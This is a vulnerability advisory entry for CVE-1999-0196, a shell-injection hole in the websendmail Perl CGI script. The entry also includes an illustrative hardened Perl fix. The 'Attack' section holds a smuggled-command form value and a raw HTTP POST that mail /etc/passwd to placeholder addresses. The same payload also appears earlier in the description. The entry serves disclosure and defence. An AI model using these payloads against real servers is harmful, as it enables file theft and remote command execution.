Brief description: websendmail is a CGI program written in Perl that fails to check user input from a form used to send e-mail.
Full description: websendmail comes with WEBgais, an interface to the GAIS search tool. It's a perl script used to send e-mail to a destination specified with user input via a form. Special characters are not removed from this user input before being used to send the email. Here is the code:
(...)
$cmd="| $MAILBIN $VAR_receiver";
open (PIPEOUT, $cmd);
The variable $VAR_receiver contains user input from the form. Suppose it contained:
';mail+xxx@yyy.zzz</etc/passwd;'
This would cause /etc/passwd to be mailed to xxx@yyy.zzz.
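As an added illustration of the flaw described above (this is not code from the websendmail script or from the original report): the vulnerable two-argument pipe open beside a hardened version that validates the receiver address against an allow-list and uses Perl's list-form open(), which runs the mailer without a shell. The $MAILBIN path and the address pattern are assumptions.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Assumed stand-in for the script's $MAILBIN setting (path is hypothetical).
my $MAILBIN = '/usr/sbin/sendmail';

# Vulnerable pattern from the websendmail excerpt: two-argument open() with a
# leading "|" hands the whole string to /bin/sh, so ";", "<", "|" and backticks
# in $receiver are interpreted as shell syntax instead of as an address.
# Defined for contrast only; never called here.
sub send_unsafe {
    my ($receiver, $body) = @_;
    my $cmd = "| $MAILBIN $receiver";
    open(my $pipe, $cmd) or die "open: $!";
    print $pipe $body;
    close $pipe;
}

# Allow-list check: one conservative address shape, bounded length.
# Anything that is not plainly an address is rejected, not "cleaned".
sub valid_receiver {
    my ($addr) = @_;
    return 0 unless defined $addr && length($addr) <= 254;
    return $addr =~ /\A[A-Za-z0-9._%+-]+\@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+\z/ ? 1 : 0;
}

# Hardened version: validate first, then use the list form of open(), which
# execs $MAILBIN directly with $receiver as a single argv entry, no shell.
sub send_safe {
    my ($receiver, $body) = @_;
    die "invalid receiver address\n" unless valid_receiver($receiver);
    open(my $pipe, '|-', $MAILBIN, $receiver) or die "open: $!";
    print $pipe $body;
    close $pipe or die "mailer exited with status " . ($? >> 8) . "\n";
}

# Constructed inputs: the payload quoted in the report (the "+" is form
# encoding for a space, so the server sees "mail xxx@yyy.zzz") and a
# legitimate address. Only the validator is exercised, so this runs offline.
for my $input (';mail+xxx@yyy.zzz</etc/passwd;', 'user@example.com') {
    printf "%-36s -> %s\n", $input,
        valid_receiver($input) ? 'accepted' : 'rejected';
}
```

The list form of open() is the part that closes the hole even if the validator is later loosened, because the receiver value can no longer reach a shell.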
Components: websendmail, version 1.0; trusted
Systems: any
Effect(s) of exploiting: The remote user can execute programs with the privileges of the web server.
Detecting the hole:
Fixing the hole:
Other information:
cgi mail perl input validation
PA Classification(s):
RISOS Classification(s):
DCS Classification(s):
CVE Number: CVE-1999-0196 -- The websendmail program in the Webgais program allows a remote user to access arbitrary files.
Attack:
telnet target.machine.com 80
POST /cgi-bin/websendmail HTTP/1.0
Content-length: xxx
(should be replaced with the actual length of the string passed to the server, in this case xxx=90)

receiver=;mail+me@here.earth</etc/passwd;&sender=a&rtnaddr=a&subject=a&content=a
Advisories: Security Focus has the Bugtraq message; ISS X-Force database entry http-webgais-smail
Related Vulnerabilities:
Reporting: Razvan Dragomirescu, drazvan@kappa.ro in Bugtraq Message-ID: <Pine.LNX.3.95.970704113121.1475A-100000@pop3.kappa.ro> (Friday, July 4th, 1997)